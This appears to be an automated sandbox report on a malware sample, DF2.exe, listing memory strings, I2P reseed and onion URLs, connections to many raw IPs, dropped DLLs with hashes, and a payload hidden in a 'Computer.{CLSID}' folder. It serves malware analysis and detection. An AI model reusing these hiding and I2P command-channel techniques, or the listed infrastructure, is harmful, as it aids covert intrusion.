Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/I
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/T
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/E
Source: libi2p.dll.21.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: update.pkg.10.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: w8m7wmyk939oczmkw4o2h16hs.exe.1.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknownNetwork traffic detected: IP country count 25
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 45.200.148.158:1129
Source: global trafficTCP traffic: 192.168.2.4:49808 -> 15.204.11.249:11623
Source: global trafficTCP traffic: 192.168.2.4:49809 -> 51.83.132.16:20700
Source: global trafficTCP traffic: 192.168.2.4:49810 -> 185.82.217.48:14412
Source: global trafficTCP traffic: 192.168.2.4:49811 -> 194.54.156.174:1941
Source: global trafficTCP traffic: 192.168.2.4:49812 -> 80.76.34.140:14505
Source: global trafficTCP traffic: 192.168.2.4:49813 -> 88.228.207.122:16453
Source: global trafficTCP traffic: 192.168.2.4:49814 -> 5.181.20.93:26893
Source: global trafficTCP traffic: 192.168.2.4:49820 -> 125.212.237.207:9325
Source: global trafficTCP traffic: 192.168.2.4:49821 -> 66.176.202.101:17154
Source: global trafficTCP traffic: 192.168.2.4:49822 -> 38.40.94.251:28976
Source: global trafficTCP traffic: 192.168.2.4:49823 -> 46.0.4.103:18202
Source: global trafficTCP traffic: 192.168.2.4:49824 -> 81.162.25.200:30484
Source: global trafficTCP traffic: 192.168.2.4:50036 -> 85.242.211.221:37987
Source: global trafficTCP traffic: 192.168.2.4:50037 -> 212.116.61.165:24605
Source: global trafficTCP traffic: 192.168.2.4:50038 -> 173.68.123.78:25043
Source: global trafficTCP traffic: 192.168.2.4:50039 -> 95.164.4.146:21309
Source: global trafficTCP traffic: 192.168.2.4:50040 -> 59.110.52.4:11876
Source: global trafficTCP traffic: 192.168.2.4:50041 -> 193.34.123.42:11721
Source: global trafficTCP traffic: 192.168.2.4:50042 -> 188.120.244.218:2632
Source: global trafficTCP traffic: 192.168.2.4:50043 -> 110.239.62.148:22444
Source: global trafficTCP traffic: 192.168.2.4:50044 -> 104.244.227.121:11334
Source: global trafficTCP traffic: 192.168.2.4:50045 -> 89.35.131.34:31750
Source: global trafficTCP traffic: 192.168.2.4:50046 -> 107.161.80.18:5022
Source: global trafficTCP traffic: 192.168.2.4:50047 -> 37.120.171.64:29956
Source: global trafficTCP traffic: 192.168.2.4:50048 -> 85.24.237.45:18608
Source: global trafficTCP traffic: 192.168.2.4:50050 -> 82.64.105.181:13166
Source: global trafficTCP traffic: 192.168.2.4:50051 -> 173.249.2.110:52911
Source: global trafficTCP traffic: 192.168.2.4:50052 -> 23.137.250.43:24642
Source: global trafficTCP traffic: 192.168.2.4:50053 -> 81.136.49.129:28063
Source: global trafficTCP traffic: 192.168.2.4:50054 -> 50.35.91.100:27295
Source: global trafficTCP traffic: 192.168.2.4:50055 -> 195.52.175.104:28212
Source: global trafficTCP traffic: 192.168.2.4:50056 -> 68.149.143.121:10687
Source: global trafficTCP traffic: 192.168.2.4:50057 -> 78.46.239.124:6802
Source: global trafficTCP traffic: 192.168.2.4:50058 -> 78.58.99.133:29641
Source: global trafficTCP traffic: 192.168.2.4:50059 -> 73.247.24.93:4965
Source: global trafficTCP traffic: 192.168.2.4:50061 -> 149.106.159.60:11959
Source: global trafficTCP traffic: 192.168.2.4:50062 -> 72.68.225.51:16190
Source: global trafficTCP traffic: 192.168.2.4:50063 -> 81.168.83.201:18290
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 67.223.218.98:27892
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 118.211.240.78:27644
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 190.62.46.158:9548
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 157.161.57.70:17777
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 162.19.153.65:18297
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 100.4.223.210:25303
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 108.180.0.49:25004
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 89.66.70.5:26711
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 93.94.147.180:28372
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 87.180.222.251:19608
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 173.59.19.119:13311
Source: global trafficUDP traffic: 192.168.2.4:18686 -> 95.188.183.13:17107
Source: global trafficUDP traffic: 192.168.2.4:9525 -> 116.202.17.147:25190
Source: global trafficUDP traffic: 192.168.2.4:9525 -> 123.57.221.156:9920
Source: global trafficUDP traffic: 192.168.2.4:9525 -> 194.110.247.42:27073
Source: global trafficUDP traffic: 192.168.2.4:9525 -> 120.26.218.134:11856
Source: Joe Sandbox ViewASN Name: XTOMxTomEU XTOMxTomEU
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: unknownTCP traffic detected without corresponding DNS query: 45.200.148.158
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E162A1A recv,WSAGetLastError,21_2_00007FFE0E162A1A
Source: global trafficHTTP traffic detected: GET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficDNS traffic detected: DNS query: reseed.i2pgit.org
Source: global trafficDNS traffic detected: DNS query: reseed.diva.exchange
Source: main.exe, 00000020.00000003.2586057584.00000200A04A8000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: http://127.0.0.1:8118
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, 00000020.00000003.2599837625.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599705548.00000200A08D0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2599641838.00000200A08F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2600230754.00000200A0506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
Source: update.pkg.10.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtC
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: update.pkg.10.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtn
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io/;
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://i2p.ghativega.in/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.ghativega.in/b.cW
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://i2p.novg.net/
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: main.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2pseed.creativecowpat.net:8443/i
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/d
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed.diva.exchange/
Source: nju2apmx83wqd9u7namsf59y.exe, 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmp, main.exe, 00000015.00000002.2482101115.000001DE3994F000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/9
Source: main.exe, 00000015.00000002.2482819721.000001DE3A1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su3
Source: main.exe, 00000015.00000003.1876236118.000001DE39E3A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000003.1876537527.000001DE39E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io/b.ci
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/6
Source: main.exe, main.exe, 00000020.00000002.2913383515.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/E
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/I
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/T
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/b
Source: main.exe, 00000015.00000002.2482716452.000001DE39D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/s
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://reseed2.i2p.net/
Source: main.exe, 00000015.00000003.1876574866.000001DE39E28000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2482716452.000001DE39E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/r
Source: main.exe, 00000020.00000002.2911993076.00000200A046D000.00000004.00000020.00020000.00000000.sdmp, libi2p.dll.21.dr, update.pkg.10.drString found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000020.00000002.2911993076.00000200A04CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/76
Source: main.exe, 00000015.00000002.2482716452.000001DE39DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/8
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC929A inet_addr,ntohl,5_2_00007FF764CC929A
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CC292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,5_2_00007FF764CC292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\Z8JRj7qu
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_029953EA0_2_029953EA
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_02985B3E0_2_02985B3E
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_02984B4A0_2_02984B4A
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_029860CE0_2_029860CE
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_0299701E0_2_0299701E
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_0299D1220_2_0299D122
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_02987F2E0_2_02987F2E
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_02989CF60_2_02989CF6
Source: C:\Users\user\Desktop\DF2.exeCode function: 0_2_0298CDA60_2_0298CDA6
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CCDE8A5_2_00007FF764CCDE8A
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: 5_2_00007FF764CCE4E05_2_00007FF764CCE4E0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A90C4C021_2_00007FF76A90C4C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FF76A91209821_2_00007FF76A912098
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0E1709C021_2_00007FFE0E1709C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE0EB525F021_2_00007FFE0EB525F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE1150F02021_2_00007FFE1150F020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 21_2_00007FFE11ECEB4021_2_00007FFE11ECEB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE117809C032_2_00007FFE117809C0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11BE25F032_2_00007FFE11BE25F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE11ECF02032_2_00007FFE11ECF020
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE126DEB4032_2_00007FFE126DEB40
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1320A8B532_2_00007FFE1320A8B5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1320A78B32_2_00007FFE1320A78B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1320A64332_2_00007FFE1320A643
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1321071032_2_00007FFE13210710
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1320A55832_2_00007FFE1320A558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FFE1330CBC032_2_00007FFE1330CBC0
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll 5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll 64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11501292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11EC1292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE13201292 appears 377 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE1330A202 appears 345 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0E161292 appears 462 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11BD1292 appears 515 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE126D2FD2 appears 387 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11771292 appears 462 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11EC2FD2 appears 387 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF76A9099E2 appears 303 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0EB41292 appears 515 times
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exeCode function: String function: 00007FF764CC14E2 appears 295 times
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Source: termsrv32.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: 5P46VR1V.21.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: LcUJSdZq.21.drStatic PE information: Number of sections : 11 > 10
Source: DF2.exeStatic PE information: Number of sections : 11 > 10
Source: YERHbDgw.21.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: evtsrv.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: DiEI7oU1.21.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.21.drStatic PE information: Number of sections : 11 > 10
Source: bT51Gn7Q.21.drStatic PE information: Number of sections : 11 > 10
